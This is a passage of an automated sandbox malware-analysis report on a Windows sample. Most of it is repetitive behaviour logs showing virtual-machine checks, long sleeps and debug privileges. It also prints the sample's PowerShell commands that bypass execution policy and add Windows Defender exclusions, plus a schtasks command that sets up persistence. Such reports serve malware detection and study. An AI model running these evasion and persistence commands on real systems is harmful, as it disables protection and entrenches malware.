            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMemory allocated: 1A860000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1650000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1B1F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1690000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1B130000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: B40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1AA10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWindow / User API: threadDelayed 8911Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWindow / User API: threadDelayed 937Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6279Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3490Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7170Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2584Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7240Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2226Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8130
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe TID: 6688Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep count: 7240 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep count: 2226 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep count: 8130 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep count: 1456 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Roaming\SYSTEM TID: 6656Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\SYSTEM TID: 6188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\SYSTEMLast function: Thread delayed
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
            Source: 72OWK7wBVH.exe, 00000000.00000002.2984813735.000000001B674000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWil%SystemRoot%\system32\mswsock.dllFormat="Hashed"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"Jump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeQueries volume information: C:\Users\user\Desktop\72OWK7wBVH.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
